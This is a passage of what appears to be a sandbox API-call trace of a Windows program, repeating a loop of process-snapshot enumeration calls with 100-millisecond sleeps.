returned 0x1a2c [0163.225] Process32First (in: hSnapshot=0x1a2c, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0163.277] Sleep (dwMilliseconds=0x64) [0163.286] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1a2c [0163.295] Process32First (in: hSnapshot=0x1a2c, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0163.342] Sleep (dwMilliseconds=0x64) [0163.348] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1a2c [0163.357] Process32First (in: hSnapshot=0x1a2c, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0163.416] Sleep (dwMilliseconds=0x64) [0163.426] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1a2c [0163.437] Process32First (in: hSnapshot=0x1a2c, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0163.496] Sleep (dwMilliseconds=0x64) [0163.510] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1a2c [0163.528] Process32First (in: hSnapshot=0x1a2c, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0163.591] Sleep (dwMilliseconds=0x64) [0163.598] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1a2c [0163.608] Process32First (in: hSnapshot=0x1a2c, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0163.656] Sleep (dwMilliseconds=0x64) [0163.660] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1a2c [0163.670] Process32First (in: hSnapshot=0x1a2c, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0163.719] Sleep (dwMilliseconds=0x64) [0163.723] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1a2c [0163.733] Process32First (in: hSnapshot=0x1a2c, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0163.824] Sleep (dwMilliseconds=0x64) [0163.833] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1a2c [0163.847] Process32First (in: hSnapshot=0x1a2c, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0163.955] Sleep (dwMilliseconds=0x64) [0163.957] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1a2c [0163.969] Process32First (in: hSnapshot=0x1a2c, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0164.076] Sleep (dwMilliseconds=0x64) [0164.082] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1a2c [0164.094] Process32First (in: hSnapshot=0x1a2c, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0164.160] Sleep (dwMilliseconds=0x64) [0164.200] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1a2c [0164.214] Process32First (in: hSnapshot=0x1a2c, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0164.271] Sleep (dwMilliseconds=0x64) [0164.286] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1a2c [0164.297] Process32First (in: hSnapshot=0x1a2c, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0164.363] Sleep (dwMilliseconds=0x64) [0164.380] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1a2c [0164.391] Process32First (in: hSnapshot=0x1a2c, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0164.450] Sleep (dwMilliseconds=0x64) [0164.457] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1a2c [0164.469] Process32First (in: hSnapshot=0x1a2c, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0164.530] Sleep (dwMilliseconds=0x64) [0164.536] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1a2c [0164.548] Process32First (in: hSnapshot=0x1a2c, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0164.609] Sleep (dwMilliseconds=0x64) [0164.613] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1a2c [0164.623] Process32First (in: hSnapshot=0x1a2c, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0164.676] Sleep (dwMilliseconds=0x64) [0164.692] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1a2c [0164.704] Process32First (in: hSnapshot=0x1a2c, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0164.756] Sleep (dwMilliseconds=0x64) [0164.771] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1a2c [0164.782] Process32First (in: hSnapshot=0x1a2c, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0164.840] Sleep (dwMilliseconds=0x64) [0164.876] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1a2c [0164.889] Process32First (in: hSnapshot=0x1a2c, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0164.980] Sleep (dwMilliseconds=0x64) [0165.009] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1a2c [0165.020] Process32First (in: hSnapshot=0x1a2c, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0165.070] Sleep (dwMilliseconds=0x64) [0165.093] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1a2c [0165.109] Process32First (in: hSnapshot=0x1a2c, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0165.199] Sleep (dwMilliseconds=0x64) [0165.207] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1a2c [0165.218] Process32First (in: hSnapshot=0x1a2c, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0165.277] Sleep (dwMilliseconds=0x64) [0165.286] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1a2c [0165.300] Process32First (in: hSnapshot=0x1a2c, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0165.356] Sleep (dwMilliseconds=0x64) [0165.363] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1a2c [0165.375] Process32First (in: hSnapshot=0x1a2c, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0165.432] Sleep (dwMilliseconds=0x64) [0165.442] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1a2c [0165.455] Process32First (in: hSnapshot=0x1a2c, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0165.512] Sleep (dwMilliseconds=0x64) [0165.520] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1a2c [0165.532] Process32First (in: hSnapshot=0x1a2c, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0165.581] Sleep (dwMilliseconds=0x64) [0165.599] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1a2c [0165.612] Process32First (in: hSnapshot=0x1a2c, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0165.676] Sleep (dwMilliseconds=0x64) [0165.692] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1a2c [0165.703] Process32First (in: hSnapshot=0x1a2c, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0165.752] Sleep (dwMilliseconds=0x64) [0165.770] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1a2c [0165.781] Process32First (in: hSnapshot=0x1a2c, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0165.853] Sleep (dwMilliseconds=0x64) [0165.870] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1a2c [0165.882] Process32First (in: hSnapshot=0x1a2c, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0165.927] Sleep (dwMilliseconds=0x64) [0165.941] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1a2c [0165.951] Process32First (in: hSnapshot=0x1a2c, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0166.005] Sleep (dwMilliseconds=0x64) [0166.022] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1a2c [0166.038] Process32First (in: hSnapshot=0x1a2c, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0166.110] Sleep (dwMilliseconds=0x64) [0166.113] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1a2c [0166.131] Process32First (in: hSnapshot=0x1a2c, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0166.230] Sleep (dwMilliseconds=0x64) [0166.238] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1a2c [0166.253] Process32First (in: hSnapshot=0x1a2c, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0166.316] Sleep (dwMilliseconds=0x64) [0166.332] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1a2c [0166.347] Process32First (in: hSnapshot=0x1a2c, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0166.409] Sleep (dwMilliseconds=0x64) [0166.427] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1a2c [0166.440] Process32First (in: hSnapshot=0x1a2c, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0166.533] Sleep (dwMilliseconds=0x64) [0166.535] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1a2c [0166.548] Process32First (in: hSnapshot=0x1a2c, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0166.610] Sleep (dwMilliseconds=0x64) [0166.624] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1a2c [0166.638] Process32First (in: hSnapshot=0x1a2c, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0166.707] Sleep (dwMilliseconds=0x64) [0166.709] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1a2c [0166.720] Process32First (in: hSnapshot=0x1a2c, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0166.768] Sleep (dwMilliseconds=0x64) [0166.770] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1a2c [0166.783] Process32First (in: hSnapshot=0x1a2c, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0166.855] Sleep (dwMilliseconds=0x64) [0166.871] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1a2c [0166.883] Process32First (in: hSnapshot=0x1a2c, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0166.937] Sleep (dwMilliseconds=0x64) [0166.942] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1a2c [0166.958] Process32First (in: hSnapshot=0x1a2c, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0167.011] Sleep (dwMilliseconds=0x64) [0167.022] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1a2c [0167.035] Process32First (in: hSnapshot=0x1a2c, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0167.099] Sleep (dwMilliseconds=0x64) [0167.114] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1a2c [0167.124] Process32First (in: hSnapshot=0x1a2c, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0167.222] Sleep (dwMilliseconds=0x64) [0167.239] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1a2c [0167.251] Process32First (in: hSnapshot=0x1a2c, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0167.313] Sleep (dwMilliseconds=0x64) [0167.317] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1a2c [0167.328] Process32First (in: hSnapshot=0x1a2c, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0167.393] Sleep (dwMilliseconds=0x64) [0167.395] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1a2c [0167.406] Process32First (in: hSnapshot=0x1a2c, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0167.467] Sleep (dwMilliseconds=0x64) [0167.473] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1a2c [0167.485] Process32First (in: hSnapshot=0x1a2c, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0167.543] Sleep (dwMilliseconds=0x64) [0167.551] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1a2c [0167.561] Process32First (in: hSnapshot=0x1a2c, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0167.623] Sleep (dwMilliseconds=0x64) [0167.629] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1a2c [0167.641] Process32First (in: hSnapshot=0x1a2c, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0167.701] Sleep (dwMilliseconds=0x64) [0167.708] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1a2c [0167.720] Process32First (in: hSnapshot=0x1a2c, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0167.775] Sleep (dwMilliseconds=0x64) [0167.804] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1a2c [0167.813] Process32First (in: hSnapshot=0x1a2c, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0167.889] Sleep (dwMilliseconds=0x64) [0167.896] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1a2c [0167.909] Process32First (in: hSnapshot=0x1a2c, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0167.969] Sleep (dwMilliseconds=0x64) [0167.973] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1a2c [0167.985] Process32First (in: hSnapshot=0x1a2c, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0168.047] Sleep (dwMilliseconds=0x64) [0168.051] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1a2c [0168.065] Process32First (in: hSnapshot=0x1a2c, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0168.128] Sleep (dwMilliseconds=0x64) [0168.146] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1a2c [0168.158] Process32First (in: hSnapshot=0x1a2c, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0168.264] Sleep (dwMilliseconds=0x64) [0168.270] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1a2c [0168.282] Process32First (in: hSnapshot=0x1a2c, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0168.337] Sleep (dwMilliseconds=0x64) [0168.350] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1a2c [0168.360] Process32First (in: hSnapshot=0x1a2c, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0168.417] Sleep (dwMilliseconds=0x64) [0168.428] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1a2c 